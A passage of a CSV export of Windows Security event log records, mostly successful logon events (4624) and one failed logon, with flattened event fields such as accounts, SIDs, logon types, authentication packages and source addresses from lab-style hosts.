NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49236 + %%1833 + +" +2019-03-19T04:02:04.210688+04:00,1552953724.210688,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,NULL,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566823 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x17e29a + 3 + NtLmSsp + NTLM + NULL + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49236 + %%1833 + +" +2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5323 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x7d4f4 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49169 + +" +2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5322 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x73d02 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49168 + +" +2019-02-13T19:29:41.418441+04:00,1550071781.418441,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5319 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x4a26d + 2 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x994 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" +2019-02-13T19:27:53.653483+04:00,1550071673.653483,4624,IEUser,PC02,10,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5315 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x45120 + 10 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x658 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 49164 + +" +2019-02-13T19:25:17.799376+04:00,1550071517.799376,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5308 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x21f73 + 2 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x198 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" +2019-02-13T19:19:51.259835+04:00,1550071191.259835,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5305 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:17:38.779337+04:00,1550071058.779337,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5303 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:17:38.018243+04:00,1550071058.018243,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5302 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x113f5 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 0 + 0x0 + - + - + - + +" +2019-02-13T19:15:08.821952+04:00,1550070908.821952,4624,sshd_server,PC02,5,Advapi,-,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5299 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1002 + sshd_server + PC02 + 0xe509 + 5 + Advapi + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:08.689762+04:00,1550070908.689762,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5296 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:07.852561+04:00,1550070907.852561,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5293 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:07.422945+04:00,1550070907.422945,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5291 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.924796+04:00,1550070905.924796,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5289 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.660417+04:00,1550070905.660417,4624,LOCAL SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5287 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.065564+04:00,1550070905.065564,4624,NETWORK SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5285 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-20 + NETWORK SERVICE + NT AUTHORITY + 0x3e4 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:04.911343+04:00,1550070904.911343,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5283 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:04.635947+04:00,1550070904.635947,4624,SYSTEM,NT AUTHORITY,0,-,-,-,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5281 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 0 + - + - + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x4 + + - + - + +" +2019-02-13T19:15:04.135227+04:00,1550070904.135227,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5278 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d4 + C:\Windows\System32\services.exe + - + - + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-03-19T03:23:57.397648+04:00,1552951437.397648,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565611 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x15e25f + 3 + Kerberos + Kerberos + + 1054A084-EFFD-F992-9C74-63873C88272E + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55873 + %%1840 + +" +2019-03-19T03:23:52.507387+04:00,1552951432.507387,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565599 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x15e1a7 + 3 + Kerberos + Kerberos + + 14CCCD18-A781-AC28-C773-EA57D49F4B90 + - + - + 0 + 0x0 + - + 10.0.2.17 + 49222 + %%1840 + +" +2019-03-19T03:23:51.772355+04:00,1552951431.772355,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565596 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x15e162 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55872 + %%1840 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565653 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x16792b + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + ::1 + 55878 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,3,Advapi,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 161473 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1009 + svc01 + MSEDGEWIN10 + 0x10b6b3 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x22afa1 + 3 + Advapi + MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x140c + C:\Windows\System32\inetsrv\w3wp.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 18206 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1bbdce + 9 + seclogo + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3c8 + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-13T22:04:58.363696+04:00,1550081098.363696,4624,admin01,EXAMPLE,10,User32,127.0.0.1,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 